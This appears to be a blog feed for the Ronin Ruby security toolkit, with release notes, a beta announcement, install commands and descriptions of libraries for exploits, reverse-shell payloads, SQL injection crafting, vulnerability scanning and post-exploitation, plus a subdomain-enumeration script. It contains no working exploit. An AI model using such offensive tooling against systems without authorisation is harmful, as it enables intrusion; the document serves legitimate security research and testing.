<a href="/docs/ronin-support/Ronin/Support/Network/ASN.html">querying ASNs</a>,
<a href="/docs/ronin-support/Ronin/Support/Network/TLD.html">parsing/enumerating TLDs</a>,
<a href="/docs/ronin-support/Ronin/Support/Network/PublicSuffix.html">parsing/enumerating Public Suffixes</a>,
<a href="/docs/ronin-support/Ronin/Support/Network/IPRange.html">enumerating IP ranges</a>, and
<a href="/docs/ronin-support/">more</a>.</li>
<li>Many new <a href="https://github.com/ronin-rb/ronin#synopsis">CLI commands</a> were added to the main <a href="https://github.com/ronin-rb/ronin#readme">ronin</a>
command.</li>
<li><a href="https://github.com/ronin-rb/ronin-repos#readme">ronin-repos</a> allows you to easily install and manage 3rd party git
repositories of exploits, payloads, etc.</li>
<li><a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a> allows managing databases, importing recon data, and query data.</li>
<li><a href="https://github.com/ronin-rb/ronin-db-activerecord#readme">ronin-db-activerecord</a> provides <a href="https://guides.rubyonrails.org/active_record_basics.html">ActiveRecord</a> models for <a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a> and
can be embedded into other Ruby apps, utils, or libraries.</li>
<li><a href="https://github.com/ronin-rb/ronin-payloads#readme">ronin-payloads</a> provides a stable API for writing custom payloads for
exploits. It also ships with many <a href="https://github.com/ronin-rb/ronin-payloads#synopsis">common bind shell and reverse shell
payloads</a>.</li>
<li><a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a> now has a stable API for writing custom exploits. It also
has a <a href="https://github.com/ronin-rb/ronin-exploits#synopsis">CLI</a> for generating and running exploits.</li>
<li><a href="https://github.com/ronin-rb/ronin-vulns#readme">ronin-vulns</a> provides classes for testing and exploiting URLs for common web
vulnerabilities, such as Local File Inclusion (LFI),
Remote File Inclusion (RFI), SQL injection (SQLi), reflective Cross Site
Scripting (XSS), Server Side Template Injection (SSTI), and Open Redirects.
It also has a <a href="https://github.com/ronin-rb/ronin-vulns#synopsis">CLI</a> for testing URLs.</li>
<li>New micro-libraries were created, such as <a href="https://github.com/ronin-rb/ronin-web-user_agents#readme">ronin-web-user_agents</a>,
<a href="https://github.com/ronin-rb/ronin-web-server#readme">ronin-web-server</a>, and <a href="https://github.com/ronin-rb/ronin-web-spider#readme">ronin-web-spider</a>.</li>
</ul>
<h2 id="what-do-you-get">What Do You Get?</h2>
<h3 id="a-powerful-cli">A Powerful CLI</h3>
<p><a href="https://github.com/ronin-rb/ronin#readme">Ronin</a> provides many powerful <a href="https://github.com/ronin-rb/ronin#synopsis">CLI commands</a>:</p>
<object class="demo" data="/images/demos/ronin_http.svg" type="image/svg+xml"></object>
<object class="demo" data="/images/demos/ronin_grep_extract.svg" type="image/svg+xml"></object>
<object class="demo" data="/images/demos/ronin_dns_enum.svg" type="image/svg+xml"></object>
<p>See <a href="https://github.com/ronin-rb/ronin#synopsis">ronin’s README</a> for more command examples.</p>
<h3 id="powerful-ruby-apis">Powerful Ruby APIs</h3>
<p><a href="https://github.com/ronin-rb/ronin#readme">Ronin</a> is made up of different Ruby <a href="https://github.com/ronin-rb">libraries</a> and
<a href="/docs/#api">powerful APIs</a>, that you can use in Ruby scripts, other Ruby apps,
or in the Ruby console.</p>
<pre class="highlight"><code class="language-ruby" data-lang="ruby"><span class="c1">#!/usr/bin/env ruby</span>
<span class="nb">require</span> <span class="s1">'<a href="https://github.com/ronin-rb/ronin-support#readme">ronin/support</a>'</span>
<span class="nb">require</span> <span class="s1">'<a href="https://github.com/postmodern/wordlist.rb#readme">wordlist</a>'</span>
<span class="n">domain</span> <span class="o">=</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">Support</span><span class="o">::</span><span class="no">Network</span><span class="o">::</span><span class="no"><a href="/docs/ronin-support/Ronin/Support/Network/Domain.html">Domain</a></span><span class="p">.</span><span class="nf"><a href="/docs/ronin-support/Ronin/Support/Network/Host.html#initialize-instance_method">new</a></span><span class="p">(</span><span class="s1">'github.com'</span><span class="p">)</span>
<span class="n">wordlist</span> <span class="o">=</span> <span class="no"><a href="https://rubydoc.info/gems/wordlist/Wordlist">Wordlist</a></span><span class="p">.</span><span class="nf"><a href="https://rubydoc.info/gems/wordlist/Wordlist#open-class_method">open</a></span><span class="p">(</span><span class="s1">'<a href="https://github.com/rbsec/dnscan/blob/master/subdomains-10000.txt">subdomains-10000.txt</a>'</span><span class="p">)</span>
<span class="n">wordlist</span><span class="p">.</span><span class="nf"><a href="https://rubydoc.info/gems/wordlist/Wordlist/File#each-instance_method">each</a></span> <span class="k">do</span> <span class="o">|</span><span class="n">word</span><span class="o">|</span>
<span class="n">host</span> <span class="o">=</span> <span class="n">domain</span><span class="p">.</span><span class="nf"><a href="/docs/ronin-support/Ronin/Support/Network/Host.html#subdomain-instance_method">subdomain</a></span><span class="p">(</span><span class="n">word</span><span class="p">)</span>
<span class="k">if</span> <span class="o">!</span><span class="n">host</span><span class="p">.</span><span class="nf"><a href="/docs/ronin-support/Ronin/Support/Network/Host.html#cname-instance_method">cname</a></span> <span class="o">&&</span> <span class="n">host</span><span class="p">.</span><span class="nf"><a href="/docs/ronin-support/Ronin/Support/Network/Host.html#has_addresses%3F-instance_method">has_addresses?</a></span>
<span class="n"><a href="/docs/ronin-support/Ronin/Support/CLI/Printing.html#print_positive-instance_method">print_success</a></span> <span class="s2">"found subdomain: </span><span class="si">#{</span><span class="n">host</span><span class="si">}</span><span class="s2">"</span>
<span class="k">end</span>
<span class="k">rescue</span> <span class="no">Interrupt</span>
<span class="k">break</span>
<span class="k">end</span></code></pre>
<p>See the <a href="/docs/#api">API documentation</a> for more documentation and examples.</p>
<h3 id="a-rich-ecosystem">A Rich Ecosystem</h3>
<table>
<tbody>
<tr>
<td><a href="https://github.com/ronin-rb/ronin#readme">ronin</a></td>
<td>The main ruby gem that provides the main <a href="https://github.com/ronin-rb/ronin#synopsis"><code class="language-plaintext highlighter-rouge">ronin</code> command</a> and pulls in the other <code class="language-plaintext highlighter-rouge">ronin-</code> gems as dependencies.</td>
</tr>
<tr>
<td><a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a></td>
<td>A support library for other <a href="https://github.com/ronin-rb">ronin-rb</a> libraries which provides most of the APIs and core-extensions which make Ruby much easier to use. <strong>tl;dr</strong> It’s like <a href="https://github.com/Gallopsled/pwntools#readme">pwntools</a> combined with <a href="https://guides.rubyonrails.org/active_support_core_extensions.html">activesupport</a>.</td>
</tr>
<tr>
<td><a href="https://github.com/ronin-rb/ronin-core#readme">ronin-core</a></td>
<td>A “core” library which provides internal APIs for the other <a href="https://github.com/ronin-rb">ronin-rb</a> libraries.</td>
</tr>
<tr>
<td><a href="https://github.com/ronin-rb/ronin-repos#readme">ronin-repos</a></td>
<td>Supports installing and managing 3rd party git repositories of exploits, payloads, or potentially any other type of Ruby code. Other libraries such as <a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a> and <a href="https://github.com/ronin-rb/ronin-payloads#readme">ronin-payloads</a> can load modules from git repositories installed via <a href="https://github.com/ronin-rb/ronin-repos#readme">ronin-repos</a>.</td>
</tr>
<tr>
<td><a href="https://github.com/ronin-rb/ronin-db-activerecord#readme">ronin-db-activerecord</a></td>
<td>Defines the <a href="https://guides.rubyonrails.org/active_record_basics.html">ActiveRecord</a> models and migrations for the <a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a>. <a href="https://github.com/ronin-rb/ronin-db-activerecord#readme">ronin-db-activerecord</a> can be used by other Ruby libraries or apps.</td>
</tr>
<tr>
<td><a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a></td>
<td>Provides a command-line interface (CLI) to <a href="https://github.com/ronin-rb/ronin-db-activerecord#readme">ronin-db-activerecord</a>. It provides the <a href="https://github.com/ronin-rb/ronin-db#synopsis"><code class="language-plaintext highlighter-rouge">ronin-db</code> command</a> for managing and querying database(s).</td>
</tr>
<tr>
<td><a href="https://github.com/ronin-rb/ronin-web-server#readme">ronin-web-server</a></td>
<td>A small library which provides a <a href="https://sinatrarb.com/">Sinatra</a> based web server customized specifically for security related tasks. It provides additional routing methods, routing conditions, helper methods, as well as a reverse proxy.</td>
</tr>
<tr>
<td><a href="https://github.com/ronin-rb/ronin-web-spider#readme">ronin-web-spider</a></td>
<td>A small library that builds on top of the battle tested <a href="https://github.com/postmodern/spidr#readme">spidr</a> library. It provides additional callback methods that are relevant to recon, such as <code class="language-plaintext highlighter-rouge">every_host</code>, <code class="language-plaintext highlighter-rouge">every_cert</code>, <code class="language-plaintext highlighter-rouge">every_favicon</code>, <code class="language-plaintext highlighter-rouge">every_javascript</code>, <code class="language-plaintext highlighter-rouge">every_javascript_string</code>, <code class="language-plaintext highlighter-rouge">every_javascript_comment</code>, <code class="language-plaintext highlighter-rouge">every_html_comment</code>, and <code class="language-plaintext highlighter-rouge">every_comment</code>.</td>
</tr>
<tr>
<td><a href="https://github.com/ronin-rb/ronin-web-user_agents#readme">ronin-web-user_agents</a></td>
<td>A small library for generating random but realistic looking <code class="language-plaintext highlighter-rouge">User-Agent</code> strings for a variety of web browsers, OSes, devices, etc.</td>
</tr>
<tr>
<td><a href="https://github.com/ronin-rb/ronin-web#readme">ronin-web</a></td>
<td>Brings together all of the other <code class="language-plaintext highlighter-rouge">ronin-web-</code> libraries and provides the <a href="https://github.com/ronin-rb/ronin-web#synopsis"><code class="language-plaintext highlighter-rouge">ronin-web</code> command</a> which provides numerous handy web related commands, such as <code class="language-plaintext highlighter-rouge">diff</code>, <code class="language-plaintext highlighter-rouge">html</code>, <code class="language-plaintext highlighter-rouge">reverse-proxy</code>, <code class="language-plaintext highlighter-rouge">server</code>, and <code class="language-plaintext highlighter-rouge">spider</code>.</td>
</tr>
<tr>
<td><a href="https://github.com/ronin-rb/ronin-code-asm#readme">ronin-code-asm</a></td>
<td>A Ruby DSL for writing assembly in pure-Ruby. It can assemble full programs or be used to write shellcode.</td>
</tr>
<tr>
<td><a href="https://github.com/ronin-rb/ronin-code-sql#readme">ronin-code-sql</a></td>
<td>A Ruby DSL for crafting SQL injections. It can also generate obfuscated SQL for bypassing filters.</td>
</tr>
<tr>
<td><a href="https://github.com/ronin-rb/ronin-vulns#readme">ronin-vulns</a></td>
<td>A Ruby library for blind vulnerability testing. It can test for Local File Inclusion (LFI), Remote File Inclusion (RFI), SQL injection (SQLi), reflective Cross Site Scripting (XSS), Server Side Template Injection (SSTI), and Open Redirects.</td>
</tr>
<tr>
<td><a href="https://github.com/ronin-rb/ronin-post_ex#readme">ronin-post_ex</a></td>
<td>A Post-Exploitation API for <a href="https://github.com/ronin-rb/ronin-post_ex#examples">interacting with compromised systems</a>. <a href="https://github.com/ronin-rb/ronin-post_ex#readme">ronin-post_ex</a> is used by both <a href="https://github.com/ronin-rb/ronin-payloads#readme">ronin-payloads</a> and <a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a>.</td>
</tr>
<tr>
<td><a href="https://github.com/ronin-rb/ronin-payloads#readme">ronin-payloads</a></td>
<td>A Ruby micro-framework for writing exploit payloads as plain old Ruby classes. <a href="https://github.com/ronin-rb/ronin-payloads#readme">ronin-payloads</a> comes with common payloads (ex: <code class="language-plaintext highlighter-rouge">exec_shell</code>, <code class="language-plaintext highlighter-rouge">bind_shell</code>, <code class="language-plaintext highlighter-rouge">reverse_shell</code>) and can also load 3rd party payloads from <a href="https://github.com/ronin-rb/ronin-repos#readme">ronin-repos</a>.</td>
</tr>
<tr>
<td><a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a></td>
<td>A Ruby micro-framework for writing and running exploits. <a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a> allows one to write exploits as plain old Ruby classes. <a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a> can load and run 3rd party exploits from either Ruby files or from <a href="https://github.com/ronin-rb/ronin-repos#readme">ronin-repos</a>. <strong>tl;dr</strong> It’s like a simpler and more modular version of <a href="https://metasploit.com">Metasploit</a>.</td>
</tr>
<tr>
<td><a href="https://github.com/ronin-rb/ronin-fuzzer#readme">ronin-fuzzer</a></td>
<td>A Ruby library and CLI for generating, mutating, and fuzzing data. The goal of <a href="https://github.com/ronin-rb/ronin-fuzzer#readme">ronin-fuzzer</a> is to be as configurable as possible.</td>
</tr>
</tbody>
</table>
<h2 id="interested">Interested?</h2>
<p>Does Ronin interest you? Do you have an idea for a feature or a new <code class="language-plaintext highlighter-rouge">ronin-</code>
library? Checkout our <a href="https://github.com/ronin-rb">GitHub</a>, join our <a href="https://discord.gg/6WAb3PsVX9">Discord server</a>, follow us on
<a href="https://infosec.exchange/@ronin_rb">Mastodon</a>, and get involved!</p>
<h2 id="special-thanks">Special Thanks</h2>
<p>A special thank you to everyone who participated in the <a href="/blog/2023/01/01/announcing-the-ronin-2-0-0-open-beta.html">Open Beta</a>. Also, a
special thank you to everyone who voted in my <em>many</em> Twitter/Mastodon polls,
which helped shape Ronin’s design.</p>
New Website and logo!2023-01-31 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/01/31/new-website-and-logo.html<p>The <a href="https://ronin-rb.dev/">website</a> has been redesigned!</p>
<p>If you notice any CSS issues on your browser or device, <em>please</em> report them to
the <a href="https://github.com/ronin-rb/ronin-rb.github.io/issues">website’s issue tracker</a>.</p>
<h2 id="new-logo">New Logo!</h2>
<p>You will also notice the brand new redesigned <a href="/images/logo.svg">logo</a>. Note that the new logo is
licensed under <a href="https://creativecommons.org/licenses/by-nd/4.0/">Creative Commons Attribution-NoDerivatives 4.0 International</a>,
meaning you can copy the logo, but not modify it, and you must link back to
<a href="https://ronin-rb.dev">https://ronin-rb.dev</a>.</p>
<h2 id="accessibility">Accessibility</h2>
<p>While we have made an effort to make the website accessible, it can probably be
made even <em>more</em> accessible. If you have any suggestions on how
to improve the website’s accessibility, please add comments to
<a href="https://github.com/ronin-rb/ronin-rb.github.io/issues/15">this issue</a>.</p>
<h2 id="contributing">Contributing</h2>
<p>If you are interested in contributing to the website, checkout the <a href="https://github.com/ronin-rb/ronin-rb.github.io">source</a>.
Note, that the website uses <a href="https://jekyllrb.com/">Jekyll</a> and <a href="https://bulma.io/">Bulma CSS</a>, and
explicitly does not use any fancy JavaScript or CSS frameworks, such as React or
Tailwind, in order to keep things as simple as possible.</p>
<p>We also have plans for adding a <a href="https://github.com/ronin-rb/ronin-rb.github.io/issues/16">dark-mode</a> which we could use
help with.</p>
<h2 id="special-thanks">Special Thanks</h2>
<p>A special thank you to everyone who provided feedback on the new website and
logo.</p>
ronin 2.0.0.beta5, ronin-support 1.0.0.beta3, ronin-db 0.1.0.beta3, ronin-web 1.0.0.beta4, and ronin-fuzzer 0.1.0.beta2 released2023-01-21 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/01/21/ronin-2-0-0-beta5-released.html<p><a href="https://github.com/ronin-rb/ronin#readme">ronin</a> <a href="https://rubygems.org/gems/ronin/versions/2.0.0.beta5">2.0.0.beta5</a>,
<a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a> <a href="https://rubygems.org/gems/ronin-support/versions/1.0.0.beta3">1.0.0.beta3</a>,
<a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a> <a href="https://rubygems.org/gems/ronin-db/versions/0.1.0.beta3">0.1.0.beta3</a>,
<a href="https://github.com/ronin-rb/ronin-web#readme">ronin-web</a> <a href="https://rubygems.org/gems/ronin-web/versions/1.0.0.beta4">1.0.0.beta4</a>, and
<a href="https://github.com/ronin-rb/ronin-fuzzer#readme">ronin-fuzzer</a> <a href="https://rubygems.org/gems/ronin-fuzzer/versions/0.1.0.beta2">0.1.0.beta2</a>
have been released. These new beta versions contain minor bugs fixes and
improved documentation.</p>
<p>To update the installed beta gems, simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gem update ronin <span class="nt">--pre</span>
</code></pre></div></div>
<p>The <a href="https://hub.docker.com/r/roninrb/ronin">docker images</a> have also been updated. To update the docker images,
simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker pull roninrb/ronin
</code></pre></div></div>
<p>Keep beta testing!</p>
ronin 2.0.0.beta4, ronin-web 1.0.0.beta3, and ronin-web-server 0.1.0.beta3 released2023-01-14 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/01/14/ronin-2-0-0-beta4-released.html<p><a href="https://github.com/ronin-rb/ronin#readme">ronin</a> <a href="https://rubygems.org/gems/ronin/versions/2.0.0.beta4">2.0.0.beta4</a>,
<a href="https://github.com/ronin-rb/ronin-web#readme">ronin-web</a> <a href="https://rubygems.org/gems/ronin-web/versions/1.0.0.beta3">1.0.0.beta3</a>, and
<a href="https://github.com/ronin-rb/ronin-web-server#readme">ronin-web-server</a> <a href="https://rubygems.org/gems/ronin-web-server/versions/0.1.0.beta3">0.1.0.beta3</a>
have been released. These new beta versions contain minor bugs fixes and
improved documentation.</p>
<p>To update the installed beta gems, simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gem update ronin <span class="nt">--pre</span>
</code></pre></div></div>
<p>The <a href="https://hub.docker.com/r/roninrb/ronin">docker images</a> have also been updated. To update the docker images,
simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker pull roninrb/ronin
</code></pre></div></div>
<p>Keep beta testing!</p>
ronin-db 0.1.0.beta2 and ronin 2.0.0.beta3 released2023-01-10 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/01/10/ronin-db-0-1-0-beta2-released.html<p><a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a> <a href="https://rubygems.org/gems/ronin-db/versions/0.1.0.beta2">0.1.0.beta2</a> and
<a href="https://github.com/ronin-rb/ronin#readme">ronin</a> <a href="https://rubygems.org/gems/ronin/versions/2.0.0.beta3">2.0.0.beta3</a> have been released. These new
beta versions fix a dependency issue with <a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a> which prevented it from
connecting to the default <a href="https://www.sqlite.org/index.html">sqlite3</a> database.</p>
<p>To update the installed beta gems, simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gem update ronin <span class="nt">--pre</span>
</code></pre></div></div>
<p>The <a href="https://hub.docker.com/r/roninrb/ronin">docker images</a> have also been updated. To update the docker images,
simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker pull roninrb/ronin
</code></pre></div></div>
<p>Keep beta testing!</p>
ronin 2.0.0.beta2, ronin-support 1.0.0.beta2, ronin-exploits 1.0.0.beta2, and ronin-web 1.0.0.beta2 released2023-01-09 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/01/09/ronin-2-0-0-beta2-released.html<p><a href="https://github.com/ronin-rb/ronin#readme">ronin</a> <a href="https://rubygems.org/gems/ronin/versions/2.0.0.beta2">2.0.0.beta2</a>,
<a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a> <a href="https://rubygems.org/gems/ronin-support/versions/1.0.0.beta2">1.0.0.beta2</a>,
<a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a> <a href="https://rubygems.org/gems/ronin-exploits/versions/1.0.0.beta2">1.0.0.beta2</a>, and
<a href="https://github.com/ronin-rb/ronin-web#readme">ronin-web</a> <a href="https://rubygems.org/gems/ronin-web/versions/1.0.0.beta2">1.0.0.beta2</a> have been released.
These new beta versions contain minor bug fixes and documentation improvements.</p>
<p>To update the installed beta gems, simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gem update ronin <span class="nt">--pre</span>
</code></pre></div></div>
<p>The <a href="https://hub.docker.com/r/roninrb/ronin">docker images</a> have also been updated. To update the docker images,
simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker pull roninrb/ronin
</code></pre></div></div>
<p>Keep beta testing!</p>
Announcing the Ronin 2.0.0 Open Beta2023-01-01 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/01/01/announcing-the-ronin-2-0-0-open-beta.html<p>Now that <a href="/blog/2022/12/30/the-big-refactor-is-done.html">the Big Refactor has been completed</a>, and the first beta versions
of Ronin 2.0.0 and the other <code class="language-plaintext highlighter-rouge">ronin-</code> gems have been released, it is finally
time to begin the Open Beta Testing phase.</p>
<h2 id="what-is-ronin">What is Ronin?</h2>
<p><a href="https://github.com/ronin-rb/ronin#readme">Ronin</a> is a Free and Open Source <a href="https://www.ruby-lang.org/">Ruby</a> Toolkit for Security Research
and Development. Ronin contains many different <a href="https://github.com/ronin-rb/ronin#synopsis">CLI commands</a>
and <a href="https://github.com/ronin-rb/">Ruby libraries</a> for a variety of security tasks, such as
encoding/decoding data, filter IPs/hosts/URLs, querying ASNs, querying DNS,
HTTP, <a href="https://github.com/ronin-rb/ronin-vulns#synopsis">scanning for web vulnerabilities</a>,
<a href="https://github.com/ronin-rb/ronin-web-spider#readme">spidering websites</a>,
<a href="https://github.com/ronin-rb/ronin-repos#synopsis">install 3rd party repositories</a> of
<a href="https://github.com/ronin-rb/ronin-exploits#readme">exploits</a> and/or
<a href="https://github.com/ronin-rb/ronin-payloads#readme">payloads</a>, <a href="https://github.com/ronin-rb/ronin-exploits#synopsis">run exploits</a>,
<a href="https://github.com/ronin-rb/ronin-exploits#examples">write new exploits</a>,
<a href="https://github.com/ronin-rb/ronin-db#synopsis">managing local databases</a>,
<a href="https://github.com/ronin-rb/ronin-fuzzer#readme">fuzzing data</a>, and much more.</p>
<h2 id="timeframe">Timeframe</h2>
<p>The Open Beta will start on <strong>January 1st, 2023</strong> and will conclude on
<strong>February 1st, 2023</strong>.</p>
<h2 id="how-to-participate">How To Participate</h2>
<ul>
<li><a href="/install/">Install Ronin 2.0.0 (beta)</a>.</li>
<li>Test the commands.</li>
<li>Test the Ruby libraries.</li>
<li>Review the <a href="https://github.com/ronin-rb/">README files</a>.</li>
<li>Review the <a href="/docs/#api">API documentation</a>.</li>
<li>Submit bug reports to the appropriate repositories for anything that does not
work or does not make sense.</li>
</ul>
<h2 id="how-to-report-issues">How To Report Issues</h2>
<p>Bugs or other issues should be reported to the relevant GitHub repository’s
issue tracker. Additionally, questions can be posted in the GitHub repository’s
forum (called “Discussions”). Each GitHub repository’s issue tracker and
forum are linked below.</p>
<p>Finally, if you’d like to chat, we have a <a href="https://discord.gg/6WAb3PsVX9">Discord server</a> which beta testers
can join.</p>
<h2 id="how-to-install-ronin-200-beta">How To Install Ronin 2.0.0 (beta)</h2>
<p>Ronin 2.0.0 (beta) and all of the other dependencies can be installed using the
new <a href="https://github.com/ronin-rb/scripts#readme">ronin-install.sh</a> installation script with the <code class="language-plaintext highlighter-rouge">--pre</code> option flag.
Simply copy and paste the follow two commands into your terminal to download
and execute the installation script:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-o</span> ronin-install.sh https://raw.githubusercontent.com/ronin-rb/scripts/main/ronin-install.sh <span class="o">&&</span> bash ronin-install.sh
</code></pre></div></div>
<article class="message is-dark">
<div class="message-header">Note:</div>
<div class="message-body">
<p>the <a href="https://github.com/ronin-rb/scripts#readme">ronin-install.sh</a> script will automatically install any
required external dependencies (ex: <code class="language-plaintext highlighter-rouge">ruby</code>, <code class="language-plaintext highlighter-rouge">libsqlite3</code>, etc) if they are not
already installed.</p>
</div>
</article>
<p>If you prefer using <a href="https://www.docker.com/">Docker</a>, there are also <a href="https://hub.docker.com/r/roninrb/ronin">Docker images</a>
available for Ubuntu, Fedora, and Alpine, that beta testers can also pull down
and run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>docker pull roninrb/ronin
<span class="nv">$ </span>docker run <span class="nt">-it</span> roninrb/ronin
root@89b5d7f15855:/# ronin <span class="nb">help</span>
</code></pre></div></div>
<h2 id="whats-installed">What’s Installed</h2>
<h3 id="ronin">ronin</h3>
<p><a href="https://github.com/ronin-rb/ronin#readme">ronin</a> is the main ruby gem and provides the main
<a href="https://github.com/ronin-rb/ronin#synopsis"><code class="language-plaintext highlighter-rouge">ronin</code> command</a> and pulls in the other <code class="language-plaintext highlighter-rouge">ronin-</code> gems as a
dependencies.</p>
<p><a href="https://github.com/ronin-rb/ronin">GitHub</a> | <a href="https://github.com/ronin-rb/ronin#readme">README</a> | <a href="https://github.com/ronin-rb/ronin#synopsis">Synopsis</a> | <a href="https://github.com/ronin-rb/ronin/issues">Issues</a> | <a href="https://github.com/ronin-rb/ronin/discussions">Forum</a> | <a href="/docs/ronin/">Documentation</a></p>
<h3 id="ronin-support">ronin-support</h3>
<p><a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a> is the support gem which provides most of the APIs and
core-extensions which make Ruby much easier to use. Users will typically use
<a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a>’s APIs in scripts, in the <code class="language-plaintext highlighter-rouge">ronin irb</code> console, or when writing
<a href="https://github.com/ronin-rb/ronin-payloads#examples">payloads</a> or <a href="https://github.com/ronin-rb/ronin-exploits#examples">exploits</a>.
Think of <a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a> as a cross between Rails’ <a href="https://guides.rubyonrails.org/active_support_core_extensions.html">activesupport</a> and
<a href="https://github.com/Gallopsled/pwntools#readme">pwntools</a>.</p>
<p><a href="https://github.com/ronin-rb/ronin-support">GitHub</a> | <a href="https://github.com/ronin-rb/ronin-support#readme">README</a> | <a href="https://github.com/ronin-rb/ronin-support#examples">Examples</a> | <a href="https://github.com/ronin-rb/ronin-support/issues">Issues</a> | <a href="https://github.com/ronin-rb/ronin-support/discussions">Forum</a> | <a href="/docs/ronin-support/">Documentation</a></p>
<h3 id="ronin-core">ronin-core</h3>
<p><a href="https://github.com/ronin-rb/ronin-core#readme">ronin-core</a> is the “core” library which provides internal APIs for the other
<code class="language-plaintext highlighter-rouge">ronin-</code> libraries. Users do not interact with <a href="https://github.com/ronin-rb/ronin-core#readme">ronin-core</a> directly, unless
they want to write their own <code class="language-plaintext highlighter-rouge">ronin-</code> library.</p>
<p><a href="https://github.com/ronin-rb/ronin-core">GitHub</a> | <a href="https://github.com/ronin-rb/ronin-core#readme">README</a> | <a href="https://github.com/ronin-rb/ronin-core#examples">Examples</a> | <a href="https://github.com/ronin-rb/ronin-core/issues">Issues</a> | <a href="https://github.com/ronin-rb/ronin-core/discussions">Forum</a> | <a href="/docs/ronin-core/">Documentation</a></p>
<h3 id="ronin-repos">ronin-repos</h3>
<p><a href="https://github.com/ronin-rb/ronin-repos#readme">ronin-repos</a> supports installing and managing 3rd party git repositories of
exploits, payloads, or potentially any other type of Ruby code. Other libraries
such as <a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a> and <a href="https://github.com/ronin-rb/ronin-payloads#readme">ronin-payloads</a> can load modules from git
repositories installed via <a href="https://github.com/ronin-rb/ronin-repos#readme">ronin-repos</a>.</p>
<p><a href="https://github.com/ronin-rb/ronin-repos">GitHub</a> | <a href="https://github.com/ronin-rb/ronin-repos#readme">README</a> | <a href="https://github.com/ronin-rb/ronin-repos#synopsis">Synopsis</a> | <a href="https://github.com/ronin-rb/ronin-repos#examples">Examples</a> | <a href="https://github.com/ronin-rb/ronin-repos/issues">Issues</a> | <a href="https://github.com/ronin-rb/ronin-repos/discussions">Forum</a> | <a href="/docs/ronin-repos/">Documentation</a></p>
<h3 id="ronin-db-activerecord">ronin-db-activerecord</h3>
<p><a href="https://github.com/ronin-rb/ronin-db-activerecord#readme">ronin-db-activerecord</a> defines the <a href="https://guides.rubyonrails.org/active_record_basics.html">ActiveRecord</a> models and migrations for the
<a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a>. <a href="https://github.com/ronin-rb/ronin-db-activerecord#readme">ronin-db-activerecord</a> can be used by other Ruby libraries or apps.</p>
<p><a href="https://github.com/ronin-rb/ronin-db-activerecord">GitHub</a> | <a href="https://github.com/ronin-rb/ronin-db-activerecord#readme">README</a> | <a href="https://github.com/ronin-rb/ronin-db-activerecord#examples">Examples</a> | <a href="https://github.com/ronin-rb/ronin-db-activerecord/issues">Issues</a> | <a href="https://github.com/ronin-rb/ronin-db-activerecord/discussions">Forum</a> | <a href="/docs/ronin-db-activerecord/">Documentation</a></p>
<h3 id="ronin-db">ronin-db</h3>
<p><a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a> provides a command-line interface (CLI) to <a href="https://github.com/ronin-rb/ronin-db-activerecord#readme">ronin-db-activerecord</a>.
It provides the <a href="https://github.com/ronin-rb/ronin-db#synopsis"><code class="language-plaintext highlighter-rouge">ronin-db</code> command</a> for managing
and querying database(s).</p>
<p><a href="https://github.com/ronin-rb/ronin-db">GitHub</a> | <a href="https://github.com/ronin-rb/ronin-db#readme">README</a> | <a href="https://github.com/ronin-rb/ronin-db#synopsis">Synopsis</a> | <a href="https://github.com/ronin-rb/ronin-db#examples">Examples</a> | <a href="https://github.com/ronin-rb/ronin-db/issues">Issues</a> | <a href="https://github.com/ronin-rb/ronin-db/discussions">Forum</a> | <a href="/docs/ronin-db/">Documentation</a></p>
<h3 id="ronin-web-server">ronin-web-server</h3>
<p><a href="https://github.com/ronin-rb/ronin-web-server#readme">ronin-web-server</a> is a small library which provides a <a href="https://sinatrarb.com/">Sinatra</a> based
web server customized specifically for security related tasks. It provides
additional routing methods, routing conditions, helper methods, as well as a
reverse proxy.</p>
